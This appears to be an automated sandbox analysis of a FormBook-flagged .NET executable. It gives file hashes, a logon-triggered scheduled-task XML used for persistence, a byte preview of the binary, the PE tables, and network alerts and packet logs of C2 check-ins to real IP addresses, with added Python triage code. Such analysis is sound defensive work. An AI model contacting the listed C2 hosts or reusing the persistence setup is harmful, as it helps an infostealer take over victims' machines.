                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1602
                                                            Entropy (8bit):5.114861334449966
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt3xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTBv
                                                            MD5:E0B9503E4DA974199A9419B926AC8556
                                                            SHA1:E21ECCA36957B28567BBA7957FCFCA391E6C6D56
                                                            SHA-256:5589E460D3EAE610AE297E25214B1BD9483759C279B3DC2F18A6DB15626814AF
                                                            SHA-512:73F785217A34F3303DAAD1D433B17EC7B709343A8F3161708A039A6A3F3623B59A471F2F377E2AEED7A4A7265F9A9A92D800F3B608E4DD8E271D3E31DE1E1C9B
                                                            Malicious:true
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                            Process:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1602
                                                            Entropy (8bit):5.114861334449966
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt3xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTBv
                                                            MD5:E0B9503E4DA974199A9419B926AC8556
                                                            SHA1:E21ECCA36957B28567BBA7957FCFCA391E6C6D56
                                                            SHA-256:5589E460D3EAE610AE297E25214B1BD9483759C279B3DC2F18A6DB15626814AF
                                                            SHA-512:73F785217A34F3303DAAD1D433B17EC7B709343A8F3161708A039A6A3F3623B59A471F2F377E2AEED7A4A7265F9A9A92D800F3B608E4DD8E271D3E31DE1E1C9B
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):974344
                                                            Entropy (8bit):7.253613594549385
                                                            Encrypted:false
                                                            SSDEEP:12288:2pZsSg9WpaxOwzcGUCAKrsylFGubbaFojeDjBsHhlas8fRQAOkR:2zsC0kwz1AKrxHaGSCHvahfRQAV
                                                            MD5:8D46BAF183C4F911EA9BF65C8797D8EA
                                                            SHA1:1C65169105317DD39497D511F4C7CC1592FBFB69
                                                            SHA-256:5D24A5CB60554C37DD1850F057E8EA8EA021CAE00CB7FEBED5CA6D9768F27502
                                                            SHA-512:6672BA6FFB9F5827B6310739976A7D7E02E620133F1AF3CD1C8B0668D86F66AB7A158ED6B5D381C18E2CD48F9A47E346009D0A1D3A46F71D0279611B2479A313
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................................@.....................................O.......0................6..............p............................................ ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B.......................H........x..........7...T~..X#...........................................0.............o.....8.....o....t.......u.........,@..t......o....r...po....-..o....r...po....+......,....o.......+&.u...........,...t........o....(........o....:t......u........,...o......*...................0...........#........}.....#........}.....#........}.....#.....L.@}......}......}.....s....}.....s....}.....sG...}.....sM...}......}......}.....(.......(.......{....(.......{!...(.......{....(.......
                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.253613594549385
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:n2pGr8w21V.exe
                                                            File size:974'344 bytes
                                                            MD5:8d46baf183c4f911ea9bf65c8797d8ea
                                                            SHA1:1c65169105317dd39497d511f4c7cc1592fbfb69
                                                            SHA256:5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502
                                                            SHA512:6672ba6ffb9f5827b6310739976a7d7e02e620133f1af3cd1c8b0668d86f66ab7a158ed6b5d381c18e2cd48f9a47e346009d0a1d3a46f71d0279611b2479a313
                                                            SSDEEP:12288:2pZsSg9WpaxOwzcGUCAKrsylFGubbaFojeDjBsHhlas8fRQAOkR:2zsC0kwz1AKrxHaGSCHvahfRQAV
                                                            TLSH:0025E63D29BD222BB175C3A78BEBF427F574986F3114AC6498D343A94346A4734C326E
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x4ebb06
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x8BCFF9D5 [Sat Apr 30 21:02:13 2044 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Signature Valid:false
                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before:13/11/2018 01:00:00
                                                            Not After:09/11/2021 00:59:59
                                                            Subject Chain:
                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                            Version:3
                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xebab4          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xec000          0x630         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xea800          0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xee000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xea1ac          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Note: the SECURITY entry holds a file offset rather than an RVA, which is why it maps to no section; the 0x3608-byte blob is an Authenticode signature whose presence says nothing about its validity. The non-zero COM_DESCRIPTOR entry (the CLR header) together with the single mscoree.dll import identifies the file as a .NET assembly, so the code of interest is the IL, not the native x86 stub.
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xe9b0c       0xe9c00   caf453f7d4094c683c92c7fbe450917c  False     0.7635371407085562  data       7.249824395566697    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xec000          0x630         0x800     e63fadfaf78859532e519db6d6962534  False     0.33642578125       data       3.492963955510138    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xee000          0xc           0x200     8dbd6384e55c29c11b2496be1be818ce  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xec090  0x3a0  data                                                                                                   0.4170258620689655
RT_MANIFEST  0xec440  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
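The static tables above can be turned into a small rule set. The following is an added example, not Joe Sandbox code and not part of the original report: it copies the section, data-directory and import values from the tables into Python and applies triage rules a reverser would run before opening the file. The entropy threshold of 7.0 bits and the virtual-size inflation ratio of 4 are assumptions chosen for this example; the .NET and Authenticode checks follow directly from the PE format.

```python
# Added example (not Joe Sandbox code): static triage rules applied to the PE
# metadata tabulated in the report for n2pGr8w21V.exe. Values are copied from
# the report tables; the thresholds below are assumptions for this example.
from collections import Counter
from dataclasses import dataclass
from math import log2


@dataclass(frozen=True)
class Section:
    name: str
    virtual_size: int
    raw_size: int
    entropy: float
    characteristics: frozenset


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform random data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


# Data directories as (virtual address or file offset, size), from the report.
DIRECTORIES = {
    "IMAGE_DIRECTORY_ENTRY_IMPORT": (0xEBAB4, 0x4F),
    "IMAGE_DIRECTORY_ENTRY_RESOURCE": (0xEC000, 0x630),
    "IMAGE_DIRECTORY_ENTRY_SECURITY": (0xEA800, 0x3608),   # file offset, not an RVA
    "IMAGE_DIRECTORY_ENTRY_BASERELOC": (0xEE000, 0xC),
    "IMAGE_DIRECTORY_ENTRY_DEBUG": (0xEA1AC, 0x70),
    "IMAGE_DIRECTORY_ENTRY_IAT": (0x2000, 0x8),
    "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR": (0x2008, 0x48),  # CLR header
}

SECTIONS = [
    Section(".text", 0xE9B0C, 0xE9C00, 7.249824395566697,
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"})),
    Section(".rsrc", 0x630, 0x800, 3.492963955510138,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".reloc", 0xC, 0x200, 0.10191042566270775,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE", "IMAGE_SCN_MEM_READ"})),
]

IMPORTS = {"mscoree.dll": ["_CorExeMain"]}

HIGH_ENTROPY = 7.0   # assumed threshold: compressed or encrypted content
INFLATION_RATIO = 4  # assumed threshold: virtual size far larger than raw size (runtime unpacking)


def triage(sections, directories, imports):
    """Return (tag, explanation) pairs; tags are stable strings for pipelines and tests."""
    findings = []
    clr_rva, clr_size = directories.get("IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", (0, 0))
    native_dlls = {dll.lower() for dll in imports}
    if clr_size and native_dlls <= {"mscoree.dll"}:
        findings.append(("dotnet",
                         "managed .NET image: CLR header at RVA 0x%x, only native import is "
                         "mscoree!_CorExeMain; decompile the IL rather than disassembling" % clr_rva))
    sig_off, sig_size = directories.get("IMAGE_DIRECTORY_ENTRY_SECURITY", (0, 0))
    if sig_size:
        findings.append(("authenticode-present",
                         "%d-byte signature blob at file offset 0x%x; verify the chain, "
                         "presence alone proves nothing" % (sig_size, sig_off)))
    for s in sections:
        if s.entropy >= HIGH_ENTROPY:
            findings.append(("high-entropy-section",
                             "%s entropy %.2f >= %.1f: packed or encrypted payload" % (s.name, s.entropy, HIGH_ENTROPY)))
        if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= s.characteristics:
            findings.append(("rwx-section", "%s is writable and executable" % s.name))
        if s.raw_size and s.virtual_size > INFLATION_RATIO * s.raw_size:
            findings.append(("virtual-inflation",
                             "%s virtual size 0x%x vs raw 0x%x: filled at runtime" % (s.name, s.virtual_size, s.raw_size)))
    return findings


if __name__ == "__main__":
    for tag, why in triage(SECTIONS, DIRECTORIES, IMPORTS):
        print("%-22s %s" % (tag, why))
```

For this sample the rules fire on the CLR header, the signature blob and the 7.25-bit .text section, which is the expected profile of a .NET loader carrying an encrypted payload; the RWX and inflation rules stay quiet and are kept so the same function is useful on native packers.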
Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2025-01-11T04:15:55.795996+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49999        188.114.96.3     80         TCP
2025-01-11T04:17:00.769441+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49978        162.0.215.33     80         TCP
2025-01-11T04:17:03.332141+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49979        162.0.215.33     80         TCP
2025-01-11T04:17:05.895359+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49980        162.0.215.33     80         TCP
2025-01-11T04:17:14.012290+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49982        104.18.73.116    80         TCP
2025-01-11T04:17:16.576340+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49983        104.18.73.116    80         TCP
2025-01-11T04:17:19.121223+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49984        104.18.73.116    80         TCP
2025-01-11T04:17:28.228467+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49986        192.185.147.100  80         TCP
2025-01-11T04:17:30.351099+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49987        192.185.147.100  80         TCP
2025-01-11T04:17:32.930452+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49988        192.185.147.100  80         TCP
2025-01-11T04:17:40.765854+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49990        13.248.169.48    80         TCP
2025-01-11T04:17:43.321805+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49991        13.248.169.48    80         TCP
2025-01-11T04:17:45.866714+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49992        13.248.169.48    80         TCP
2025-01-11T04:17:58.927917+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49994        15.197.148.33    80         TCP
2025-01-11T04:18:01.489180+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49995        15.197.148.33    80         TCP
2025-01-11T04:18:04.955418+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49996        15.197.148.33    80         TCP
2025-01-11T04:18:13.859937+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.7  49998        188.114.96.3     80         TCP
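The alert table shows the check-in signature firing in groups of three against one host, roughly 2.5 seconds apart, before moving to the next host. FormBook works through a configured list of domains of which most are decoys, so a host that receives a check-in POST is a contact, not necessarily the live C2; the cadence, not the individual destination, is the durable signal. The following added example, not Joe Sandbox code and not part of the original report, recovers that cadence from the alert rows above: it embeds the 17 alert rows (timestamp, SID, destination IP) as constructed input and groups consecutive same-destination alerts into bursts. The 5-second burst window is an assumption chosen for this data.

```python
# Added example (not Joe Sandbox code): burst and rotation analysis of the
# Suricata alerts tabulated in the report. ALERTS holds the alert rows copied
# from the report (timestamp, SID, destination IP); the window is an assumption.
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import median

ALERTS = """\
2025-01-11T04:15:55.795996+0100 2855464 188.114.96.3
2025-01-11T04:17:00.769441+0100 2855464 162.0.215.33
2025-01-11T04:17:03.332141+0100 2855464 162.0.215.33
2025-01-11T04:17:05.895359+0100 2855464 162.0.215.33
2025-01-11T04:17:14.012290+0100 2855464 104.18.73.116
2025-01-11T04:17:16.576340+0100 2855464 104.18.73.116
2025-01-11T04:17:19.121223+0100 2855464 104.18.73.116
2025-01-11T04:17:28.228467+0100 2855464 192.185.147.100
2025-01-11T04:17:30.351099+0100 2855464 192.185.147.100
2025-01-11T04:17:32.930452+0100 2855464 192.185.147.100
2025-01-11T04:17:40.765854+0100 2855464 13.248.169.48
2025-01-11T04:17:43.321805+0100 2855464 13.248.169.48
2025-01-11T04:17:45.866714+0100 2855464 13.248.169.48
2025-01-11T04:17:58.927917+0100 2855464 15.197.148.33
2025-01-11T04:18:01.489180+0100 2855464 15.197.148.33
2025-01-11T04:18:04.955418+0100 2855464 15.197.148.33
2025-01-11T04:18:13.859937+0100 2855464 188.114.96.3
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    dst: str


@dataclass
class Burst:
    dst: str
    start: datetime
    end: datetime
    count: int
    median_gap: float  # seconds between consecutive hits; 0.0 for a single hit


def parse_alerts(text):
    """Parse 'timestamp sid dst' rows into Alert objects sorted by time."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, dst = line.split()
        alerts.append(Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), int(sid), dst))
    return sorted(alerts, key=lambda a: a.ts)


def bursts(alerts, window=5.0):
    """Group consecutive alerts to the same destination that are <= window seconds apart."""
    result, run = [], []
    for a in list(alerts) + [None]:  # trailing sentinel flushes the last run
        if run and (a is None or a.dst != run[-1].dst
                    or (a.ts - run[-1].ts).total_seconds() > window):
            gaps = [(y.ts - x.ts).total_seconds() for x, y in zip(run, run[1:])]
            result.append(Burst(run[0].dst, run[0].ts, run[-1].ts, len(run),
                                median(gaps) if gaps else 0.0))
            run = []
        if a is not None:
            run.append(a)
    return result


def rotation_summary(alerts, window=5.0):
    """Per destination: total hits, number of bursts, first and last contact."""
    per_dst = defaultdict(lambda: {"hits": 0, "bursts": 0, "first": None, "last": None})
    for b in bursts(alerts, window):
        d = per_dst[b.dst]
        d["hits"] += b.count
        d["bursts"] += 1
        d["first"] = b.start if d["first"] is None else min(d["first"], b.start)
        d["last"] = b.end if d["last"] is None else max(d["last"], b.end)
    return dict(per_dst)


if __name__ == "__main__":
    parsed = parse_alerts(ALERTS)
    for b in bursts(parsed):
        print("%s  %-16s hits=%d  median_gap=%.2fs" % (b.start.time(), b.dst, b.count, b.median_gap))
    for dst, d in rotation_summary(parsed).items():
        print("%-16s hits=%d bursts=%d  %s .. %s" % (dst, d["hits"], d["bursts"], d["first"].time(), d["last"].time()))
```

On this data the output is five bursts of exactly three hits with a median gap near 2.5 s, plus two single hits against 188.114.96.3 about two minutes apart; that host is the only one contacted twice, which is worth noting but, given the decoy-list behaviour, is not proof that it is the real C2.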
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 11, 2025 04:16:44.365437984 CET  49929        80         192.168.2.7      185.106.208.3
Jan 11, 2025 04:16:44.370311022 CET  80           49929      185.106.208.3    192.168.2.7
Jan 11, 2025 04:16:44.370399952 CET  49929        80         192.168.2.7      185.106.208.3
Jan 11, 2025 04:16:44.380201101 CET  49929        80         192.168.2.7      185.106.208.3
Jan 11, 2025 04:16:44.385016918 CET  80           49929      185.106.208.3    192.168.2.7
Jan 11, 2025 04:16:45.093354940 CET  80           49929      185.106.208.3    192.168.2.7
Jan 11, 2025 04:16:45.093393087 CET  80           49929      185.106.208.3    192.168.2.7
Jan 11, 2025 04:16:45.093550920 CET  49929        80         192.168.2.7      185.106.208.3
Jan 11, 2025 04:16:45.096637011 CET  49929        80         192.168.2.7      185.106.208.3
Jan 11, 2025 04:16:45.101494074 CET  80           49929      185.106.208.3    192.168.2.7
Jan 11, 2025 04:17:00.164433002 CET  49978        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:00.169384003 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.169501066 CET  49978        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:00.184354067 CET  49978        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:00.189210892 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.769330025 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.769350052 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.769428968 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.769442081 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.769440889 CET  49978        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:00.769479036 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.769483089 CET  49978        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:00.769491911 CET  80           49978      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:00.769524097 CET  49978        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:01.686954021 CET  49978        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:02.705539942 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:02.710545063 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:02.710628986 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:02.725404024 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:02.730303049 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.331998110 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.332042933 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.332119942 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.332140923 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:03.332158089 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.332192898 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.332209110 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:03.332230091 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.332262993 CET  80           49979      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:03.332274914 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:03.332308054 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:04.233820915 CET  49979        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:05.287898064 CET  49980        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:05.292959929 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.293040991 CET  49980        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:05.309784889 CET  49980        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:05.314687014 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.314821959 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.895186901 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.895307064 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.895327091 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.895339012 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.895351887 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.895359039 CET  49980        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:05.895365953 CET  80           49980      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:05.895395041 CET  49980        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:05.895420074 CET  49980        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:06.812016964 CET  49980        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:07.918438911 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:07.923410892 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:07.923491001 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:08.048028946 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:08.053124905 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.515913010 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.515969038 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516007900 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516045094 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516079903 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516114950 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516148090 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516182899 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516194105 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:08.516216993 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516257048 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516263962 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:08.516293049 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:08.516350031 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:08.516374111 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:08.520865917 CET  49981        80         192.168.2.7      162.0.215.33
Jan 11, 2025 04:17:08.525793076 CET  80           49981      162.0.215.33     192.168.2.7
Jan 11, 2025 04:17:13.561748981 CET  49982        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:13.566521883 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:13.566607952 CET  49982        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:13.583718061 CET  49982        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:13.588551044 CET  80           49982      104.18.73.116    192.168.2.7
